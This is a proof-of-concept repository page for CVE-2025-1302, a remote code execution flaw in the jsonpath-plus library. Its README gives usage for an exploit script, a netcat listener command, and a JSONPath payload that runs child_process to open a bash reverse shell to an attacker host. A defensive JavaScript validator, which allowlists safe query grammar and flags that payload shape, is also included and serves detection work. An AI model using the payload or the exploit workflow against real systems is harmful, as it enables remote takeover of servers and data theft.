
CVE-2025-1302 PoC — JSONPath Plus Security Vulnerability

Source
Associated Vulnerability
Title: JSONPath Plus Security Vulnerability (CVE-2025-1302)
Description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Description
PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
Readme
## CVE-2025-1302 JSONPath-Plus RCE PoC

**PoC Script Name:** `poc.py`

A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the `jsonpath-plus` library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.

---

### Features

* **Flexible HTTP methods**: Supports **POST**, **GET**, or **AUTO** (POST with GET fallback) via `--method` or `--no-fallback` flags.
* **Custom payloads**: Load one or more JSONPath RCE payload templates from a file, with `{ip}` and `{port}` templating.
* **Built-in default payload**: If no payload file is provided, uses a fully-formed bash reverse shell template.
* **Verbose debugging**: Prints full request/response bodies for both POST and GET attempts when they fail.
* **Progress indicators**: Displays delay and payload loops with `tqdm` progress bars.
* **Logging**: Optionally save all results to a JSON file with `--output`.

### Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/yourorg/jsonpath-rce-poc.git
   cd jsonpath-rce-poc
   ```

2. Install dependencies (requires Python 3.6+):

   ```bash
   pip install -r requirements.txt
   ```

### Usage

1. Start a listener on your attacker machine (replace port as needed):

   ```bash
   nc -lvnp 9999
   ```

2. Run the PoC:

   ```bash
   python3 poc.py \
     --url http://TARGET_HOST:PORT/query \
     --ip ATTACKER_IP --port 9999 \
     [--payload-file payloads.txt] \
     [--delay 5] \
     [--method AUTO|POST|GET] \
     [--no-fallback] \
     [--output results.json]
   ```

* **`--payload-file`**: File containing one JSONPath payload per line. Use `{ip}` and `{port}` placeholders.
* **`--delay`**: Seconds to wait before sending payloads (shows countdown).
* **`--method`**: Force `POST`, `GET`, or `AUTO` (default).
* **`--no-fallback`**: Shorthand to skip any GET retry (equivalent to `--method POST`).
* **`--output`**: Path to save JSON log of attempts.

### Example Payload File

```text
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
```
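The payload above only works because a filter expression `?(...)` reaches the library's expression evaluator. As an added example (not code from the PoC repository or from jsonpath-plus), the validator below allowlists a plain member/index grammar for user-supplied JSONPath strings and rejects anything containing filter or script expressions before the string is handed to the library; the sample queries are constructed.

```javascript
// Allowlisted grammar: a root "$" followed by any number of
//   .name  ..name  .*  ..*  [n]  [*]  ['name']  ["name"]
// Anything else, in particular "?(" filter blocks and "(" script blocks,
// is refused. This is an example pre-filter, not a jsonpath-plus API.
const SEGMENT = String.raw`(?:\.\.?(?:[A-Za-z_$][\w$]*|\*)|\[(?:\d+|\*|'[^'\\]*'|"[^"\\]*")\])`;
const SAFE_JSONPATH = new RegExp('^\\$' + SEGMENT + '*$');

// Explain why a query was refused; handy as a structured field in a rejection log.
function classifyRejection(query) {
  if (/\?\(/.test(query)) return 'filter-expression';
  if (/\(/.test(query)) return 'script-expression';
  if (/constructor|require|process|child_process/i.test(query)) return 'host-object-access';
  return 'outside-allowed-grammar';
}

// Returns { allowed, reason } for one query string; length cap is an assumed policy value.
function validateJsonPath(query) {
  if (typeof query !== 'string' || query.length > 512) {
    return { allowed: false, reason: 'bad-type-or-length' };
  }
  if (SAFE_JSONPATH.test(query)) return { allowed: true, reason: null };
  return { allowed: false, reason: classifyRejection(query) };
}

// Constructed sample: two legitimate queries, the payload shape from the
// README (with its {ip}/{port} placeholders), and a script-expression index.
const SAMPLE_QUERIES = [
  '$.store.book[0].title',
  "$..book[*]['author']",
  '$[?(@.constructor.constructor("require(\\"child_process\\").execSync(\\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\\")")())]',
  '$.items[(@.length-1)]',
];

// Validate a batch of queries, e.g. request bodies pulled from an access log.
function auditQueries(queries) {
  return queries.map((q) => ({ query: q, ...validateJsonPath(q) }));
}

for (const r of auditQueries(SAMPLE_QUERIES)) {
  console.log(`${r.allowed ? 'ALLOW ' : 'REJECT'} ${r.reason ?? ''} ${r.query}`);
}
```

Only queries that pass this validator should be passed to jsonpath-plus; the rejection reason gives the application a stable value to alert on.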

### Contribution

1. Fork the repo and create a feature branch.
2. Submit a pull request with your changes.

### Disclaimer

Use this script **only** in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.
File Snapshot

```text
[4.0K] /data/pocs/d156ca8a63881b4a9a3db53db8332072774dc949
├── [1.0K] LICENSE
├── [ 289] package.json
├── [4.4K] poc.py
└── [2.4K] README.md

0 directories, 4 files
```